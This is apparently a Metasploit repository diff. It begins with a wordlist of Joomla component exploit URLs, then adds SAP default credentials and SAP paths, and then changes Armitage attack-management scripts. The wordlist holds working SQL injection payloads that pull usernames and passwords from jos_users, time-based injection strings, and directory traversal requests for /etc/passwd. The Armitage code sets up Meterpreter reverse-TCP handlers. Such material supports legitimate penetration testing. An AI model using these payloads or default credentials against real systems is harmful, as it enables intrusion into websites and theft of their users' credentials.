index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'

4
data/wordlists/sap_default.txt
View File

@ -12,3 +12,7 @@ ADS_AGENT ch4ngeme
DEVELOPER ch4ngeme
J2EE_ADMIN ch4ngeme
SAPJSF ch4ngeme
SAPR3 SAP
CTB_ADMIN sap123
XMI_DEMO sap123

80
data/wordlists/sap_icm_paths.txt
View File

@ -93,11 +93,11 @@
/rwb/version.html
/sap/admin
/sap/bc/bsp/esh_os_service/favicon.gif
/sap/bc/bsp/sap
/sap/bc/bsp/sap
/sap/bc/bsp/sap/alertinbox
/sap/bc/bsp/sap/bsp_dlc_frcmp
/sap/bc/bsp/sap/bsp_veri
/sap/bc/bsp/sap/bsp_verificatio
/sap/bc/bsp/sap/bsp_verificatio
/sap/bc/bsp/sap/bsp_wd_base
/sap/bc/bsp/sap/bspwd_basics
/sap/bc/bsp/sap/certmap
@ -116,31 +116,46 @@
/sap/bc/bsp/sap/graph_bsp_test
/sap/bc/bsp/sap/graph_bsp_test/Mimes
/sap/bc/bsp/sap/gsbirp
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/hrrcf_wd_dovru
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/iccmp_bp_cnfirm
/sap/bc/bsp/sap/iccmp_hdr_cntnr
/sap/bc/bsp/sap/iccmp_hdr_cntnt
/sap/bc/bsp/sap/iccmp_header
/sap/bc/bsp/sap/iccmp_ssc_ll/
/sap/bc/bsp/sap/ic_frw_notify
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/it00/default.htm
/sap/bc/bsp/sap/it00/http_client.htm
/sap/bc/bsp/sap/it00/http_client_xml.htm
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/public/graphics
/sap/bc/bsp/sap/sam_demo
/sap/bc/bsp/sap/sam_notifying
/sap/bc/bsp/sap/sam_sess_queue
/sap/bc/bsp/sap/sbspext_htmlb
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/sbspext_htmlb
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/spi_admin
/sap/bc/bsp/sap/spi_monitor
/sap/bc/bsp/sap/sxms_alertrules
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/thtmlb_scripts
/sap/bc/bsp/sap/thtmlb_styles
/sap/bc/bsp/sap/uicmp_ltx
/sap/bc/bsp/sap/xmb_bsp_log
/sap/bc/contentserver
/sap/bc/echo
/sap/bc/erecruiting/applwzd
/sap/bc/erecruiting/confirmation_e
/sap/bc/erecruiting/confirmation_i
/sap/bc/erecruiting/dataoverview
/sap/bc/erecruiting/password
/sap/bc/erecruiting/posting_apply
/sap/bc/erecruiting/qa_email_e
/sap/bc/erecruiting/qa_email_i
/sap/bc/erecruiting/registration
/sap/bc/erecruiting/startpage
/sap/bc/erecruiting/verification
/sap/bc/error
/sap/bc/FormToRfc
/sap/bc/graphics/net
@ -165,10 +180,36 @@
/sap/bc/webdynpro/sap/cnp_light_test
/sap/bc/webdynpro/sap/configure_application
/sap/bc/webdynpro/sap/configure_component
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
/sap/bc/webdynpro/sap/esh_eng_modelling
/sap/bc/webdynpro/sap/esh_search_results.ui
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
/sap/bc/webdynpro/sap/hrrcf_a_appls
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
/sap/bc/webdynpro/sap/wd_analyze_config_appl
/sap/bc/webdynpro/sap/wd_analyze_config_comp
@ -196,11 +237,12 @@
/sapmc/sapmc.html
/sap/monitoring/
/sap/public/bc
/sap/public/bc
/sap/public/bc/icons
/sap/public/bc/icons_rtl
/sap/public/bc/its
/sap/public/bc/its/designs
/sap/public/bc/its/mimes
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
/sap/public/bc/its/mobile/itsmobile00
/sap/public/bc/its/mobile/itsmobile01
/sap/public/bc/its/mobile/rfid
@ -211,8 +253,9 @@
/sap/public/bc/pictograms
/sap/public/bc/sicf_login_run
/sap/public/bc/trex
/sap/public/bc/ur
/sap/public/bc/ur
/sap/public/bc/wdtracetool
/sap/public/bc/webdynpro
/sap/public/bc/webdynpro/adobechallenge
/sap/public/bc/webdynpro/mimes
/sap/public/bc/webdynpro/ssr
@ -220,16 +263,17 @@
/sap/public/bc/webicons
/sap/public/bc/workflow
/sap/public/bc/workflow/shortcut
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/bc
/sap/public/bsp
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/bc
/sap/public/bsp/sap/public/faa
/sap/public/bsp/sap/public/graphics
/sap/public/bsp/sap/public/graphics/jnet_handler
/sap/public/bsp/sap/public/graphics/mimes
/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/icf_check
/sap/public/icf_info
/sap/public/icf_info/icr_groups

2
external/source/armitage/build.xml vendored
View File

@ -16,6 +16,8 @@
depend="yes"
debug="true"
optimize="yes"
target="1.6"
source="1.6"
includeantruntime="fuckno"
>
<classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />

2
external/source/armitage/resources/about.html vendored
View File

@ -3,7 +3,7 @@
<center><h1>Armitage 1.45</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 4 Jan 13</p>
<br />Release: 12 Feb 13</p>
<br />
<p>Developed by:</p>

1
external/source/armitage/resources/msfconsole.style vendored
View File

@ -4,6 +4,7 @@
^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
^\[\*\] (.*) \cC[*]\o $1
^\[\+\] (.*) \c9[+]\o $1
^\[\!\] (.*) \c8[!]\o $1
^\[\-\] (.*) \c4[-]\o $1
^ =\[ (.*) =[\c7 $1
^(=[=\s]+) \cE$1

12
external/source/armitage/resources/msfrpcd_new.bat vendored Normal file
View File

@ -0,0 +1,12 @@
@echo off
set BASE=$$BASE$$..\..\
cd "%BASE%"
set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
IF NOT EXIST "%BASE%java" GOTO NO_JAVA
set JAVA_HOME="%BASE%java"
:NO_JAVA
set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
set MSF_BUNDLE_GEMS=0
set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
cd "%BASE%apps\pro\msf3"
rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$

27
external/source/armitage/scripts-cortana/cortanadb.sl vendored
View File

@ -42,8 +42,13 @@ sub c_client {
sub setupHandlers {
find_job("Exploit: multi/handler", {
if ($1 == -1) {
# set LPORT for the user...
local('$c');
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
call($client, "console.release", $c);
# setup a handler for meterpreter
call($client, "core.setg", "LPORT", randomPort());
call($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
@ -55,7 +60,7 @@ sub setupHandlers {
sub main {
global('$client $mclient');
local('%r $exception');
local('%r $exception $lhost $temp $c');
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
@ -81,8 +86,24 @@ sub main {
# setup second thread.
%r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
# resolve lhost..
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LHOST\n");
while ($lhost eq "") {
$temp = call($client, "console.read", $c)['data'];
if (["$temp" startsWith: "LHOST => "]) {
$lhost = substr(["$temp" trim], 9);
}
else {
# this shouldn't happen because having LHOST set is a precondition
# for Cortana to connect to a team server.
sleep(1000);
}
}
call($client, "console.release", $c);
# pass some objects back yo.
[$loader passObjects: $client, $mclient];
[$loader passObjects: $client, $mclient, $lhost];
# don't make previous messages available...
call($mclient, "armitage.skip");

24
external/source/armitage/scripts-cortana/internal.sl vendored
View File

@ -9,7 +9,10 @@ import msf.*;
# setg("varname", "value")
sub setg {
call_async("core.setg", $1, $2);
if ($1 eq "LHOST") {
call_async("armitage.set_ip", $2);
}
cmd_safe("setg $1 $2");
}
sub readg {
@ -335,14 +338,22 @@ sub multi_handler {
}
sub handler {
local('%o $3');
local('%o $3 $key $value');
# default options
%o['PAYLOAD'] = $1;
%o['LPORT'] = $2;
%o['DisablePayloadHandler'] = 'false';
%o['ExitOnSession'] = 'false';
# let the user override anything
if ($3) {
%o = copy($3);
foreach $key => $value ($3) {
%o[$key] = $value;
}
}
%o['PAYLOAD'] = "payload/ $+ $1";
%o['LPORT'] = $2;
# make sure LHOST is correct
if ('LHOST' !in %o) {
if ("*http*" iswm $1) {
%o['LHOST'] = lhost();
@ -352,6 +363,7 @@ sub handler {
}
}
# let's do it...
return launch('exploit', 'multi/handler', %o);
}

34
external/source/armitage/scripts/armitage.sl vendored
View File

@ -15,7 +15,7 @@ import graph.*;
import java.awt.image.*;
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS');
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME');
sub describeHost {
local('$desc');
@ -59,7 +59,7 @@ sub showHost {
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
push(@overlay, 'resources/windowsxp.png');
}
else if ("*8*" iswm $match) {
else if ("*8*" iswm $match && "*2008*" !iswm $match) {
push(@overlay, 'resources/windows8.png');
}
else {
@ -139,7 +139,7 @@ sub _connectToMetasploit {
$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
$flag = 10;
while ($flag) {
@ -160,11 +160,12 @@ sub _connectToMetasploit {
}
# connecting locally? go to Metasploit directly...
if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
if ($REMOTE is $null) {
$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
$aclient = [new RpcAsync: $client];
$mclient = $client;
initConsolePool();
$DESCRIBE = "localhost";
}
# we have a team server... connect and authenticate to it.
else {
@ -172,6 +173,11 @@ sub _connectToMetasploit {
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
$mclient = setup_collaboration($3, $4, $1, $2);
$aclient = $mclient;
if ($mclient is $null) {
[$progress close];
return;
}
}
$flag = $null;
}
@ -239,10 +245,6 @@ sub _connectToMetasploit {
[$progress setNote: "Connected: ..."];
[$progress setProgress: 60];
if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
}
dispatchEvent(&postSetup);
}, \$progress));
}
@ -323,28 +325,23 @@ sub postSetup {
}
sub main {
local('$console $panel $dir');
local('$console $panel $dir $app');
$frame = [new ArmitageApplication];
$frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient];
[$frame setTitle: $TITLE];
[$frame setSize: 800, 600];
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
init_menus($frame);
initLogSystem();
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
[$frame show];
[$frame setExtendedState: [JFrame MAXIMIZED_BOTH]];
# this window listener is dead-lock waiting to happen. That's why we're adding it in a
# separate thread (Sleep threads don't share data/locks).
fork({
[$frame addWindowListener: {
[$__frame__ addWindowListener: {
if ($0 eq "windowClosing" && $msfrpc_handle !is $null) {
closef($msfrpc_handle);
}
}];
}, \$msfrpc_handle, \$frame);
}, \$msfrpc_handle, \$__frame__);
dispatchEvent({
if ($client !is $mclient) {
@ -375,7 +372,6 @@ sub checkDir {
}
}
setLookAndFeel();
checkDir();
if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) {

8
external/source/armitage/scripts/attacks.sl vendored
View File

@ -679,12 +679,20 @@ sub addFileListener {
$actions["SigningCert"] = $actions["*FILE*"];
$actions["SigningKey"] = $actions["*FILE*"];
$actions["Wordlist"] = $actions["*FILE*"];
$actions["EXE::Custom"] = $actions["*FILE*"];
$actions["EXE::Template"] = $actions["*FILE*"];
$actions["WORDLIST"] = $actions["*FILE*"];
$actions["REXE"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = lambda(&chooseSession);
# helpers to set credential pairs from database... yay?
$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
$actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
$actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass");
# set up an action to pop up a file chooser for different file type values.
$actions["RHOST"] = {
local('$title $temp');

4
external/source/armitage/scripts/collaborate.sl vendored
View File

@ -23,6 +23,7 @@ sub createEventLogTab {
$client = [$cortana getEventLog: $console];
[$client setEcho: $null];
[$console updatePrompt: "> "];
[new EventLogTabCompletion: $console, $mclient];
}
else {
[$console updateProperties: $preferences];
@ -63,6 +64,7 @@ sub c_client {
# run this thing in its own thread to avoid really stupid deadlock situations
local('$handle');
$handle = [[new SecureSocket: $1, int($2), &verify_server] client];
push(@CLOSEME, $handle);
return wait(fork({
local('$client');
$client = newInstance(^RpcConnection, lambda({
@ -91,9 +93,11 @@ sub setup_collaboration {
%r = call($mclient, "armitage.validate", $1, $2, $nick, "armitage", 120326);
if (%r["error"] eq "1") {
showErrorAndQuit(%r["message"]);
return $null;
}
%r = call($client, "armitage.validate", $1, $2, $null, "armitage", 120326);
$DESCRIBE = "$nick $+ @ $+ $3";
return $mclient;
}

57
external/source/armitage/scripts/gui.sl vendored
View File

@ -95,13 +95,13 @@ sub dispatchEvent {
sub showError {
dispatchEvent(lambda({
[JOptionPane showMessageDialog: $frame, $message];
[JOptionPane showMessageDialog: $__frame__, $message];
}, $message => $1));
}
sub showErrorAndQuit {
[JOptionPane showMessageDialog: $frame, $1];
[System exit: 0];
[JOptionPane showMessageDialog: $__frame__, $1];
[$__frame__ closeConnect];
}
sub ask {
@ -155,7 +155,7 @@ sub chooseFile {
[$fc setFileSelectionMode: [JFileChooser DIRECTORIES_ONLY]];
}
[$fc showOpenDialog: $frame];
[$fc showOpenDialog: $__frame__];
if ($multi) {
return [$fc getSelectedFiles];
@ -179,17 +179,18 @@ sub saveFile2 {
[$fc setSelectedFile: [new java.io.File: $sel]];
}
[$fc showSaveDialog: $frame];
$file = [$fc getSelectedFile];
if ($file !is $null) {
return $file;
if ([$fc showSaveDialog: $__frame__] == 0) {
$file = [$fc getSelectedFile];
if ($file !is $null) {
return $file;
}
}
}
sub saveFile {
local('$fc $file');
$fc = [new JFileChooser];
[$fc showSaveDialog: $frame];
[$fc showSaveDialog: $__frame__];
$file = [$fc getSelectedFile];
if ($file !is $null) {
local('$ihandle $data $ohandle');
@ -250,10 +251,10 @@ sub left {
sub dialog {
local('$dialog $4');
$dialog = [new JDialog: $frame, $1];
$dialog = [new JDialog: $__frame__, $1];
[$dialog setSize: $2, $3];
[$dialog setLayout: [new BorderLayout]];
[$dialog setLocationRelativeTo: $frame];
[$dialog setLocationRelativeTo: $__frame__];
return $dialog;
}
@ -261,7 +262,15 @@ sub window {
local('$dialog $4');
$dialog = [new JFrame: $1];
[$dialog setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
[$dialog setDefaultCloseOperation: [JFrame EXIT_ON_CLOSE]];
fork({
[$dialog addWindowListener: {
if ($0 eq "windowClosing") {
[$__frame__ closeConnect];
}
}];
}, \$__frame__, \$dialog);
[$dialog setSize: $2, $3];
[$dialog setLayout: [new BorderLayout]];
return $dialog;
@ -277,12 +286,14 @@ sub overlay_images {
return %cache[join(';', $1)];
}
local('$file $image $buffered $graphics');
local('$file $image $buffered $graphics $resource');
$buffered = [new BufferedImage: 1000, 776, [BufferedImage TYPE_INT_ARGB]];
$graphics = [$buffered createGraphics];
foreach $file ($1) {
$image = [ImageIO read: resource($file)];
$resource = resource($file);
$image = [ImageIO read: $resource];
closef($resource);
[$graphics drawImage: $image, 0, 0, 1000, 776, $null];
}
@ -371,15 +382,6 @@ sub wrapComponent {
return $panel;
}
sub setLookAndFeel {
local('$laf');
foreach $laf ([UIManager getInstalledLookAndFeels]) {
if ([$laf getName] eq [$preferences getProperty: "application.skin.skin", "Nimbus"]) {
[UIManager setLookAndFeel: [$laf getClassName]];
}
}
}
sub thread {
local('$thread');
$thread = [new ArmitageThread: $1];
@ -446,7 +448,7 @@ sub quickListDialog {
$button = [new JButton: $2];
[$button addActionListener: lambda({
[$callback : [$model getSelectedValueFromColumn: $table, $lead]];
[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model];
[$dialog setVisible: 0];
}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
@ -467,6 +469,13 @@ sub quickListDialog {
[$dialog setVisible: 1];
}
sub setTableColumnWidths {
local('$col $width $temp');
foreach $col => $width ($2) {
[[$1 getColumn: $col] setPreferredWidth: $width];
}
}
sub tableRenderer {
return [ATable getDefaultTableRenderer: $1, $2];
}

4
external/source/armitage/scripts/hosts.sl vendored
View File

@ -8,10 +8,10 @@ import java.awt.event.*;
sub addHostDialog {
local('$dialog $label $text $finish $button');
$dialog = [new JDialog: $frame, "Add Hosts", 0];
$dialog = [new JDialog: $__frame__, "Add Hosts", 0];
[$dialog setSize: 320, 240];
[$dialog setLayout: [new BorderLayout]];
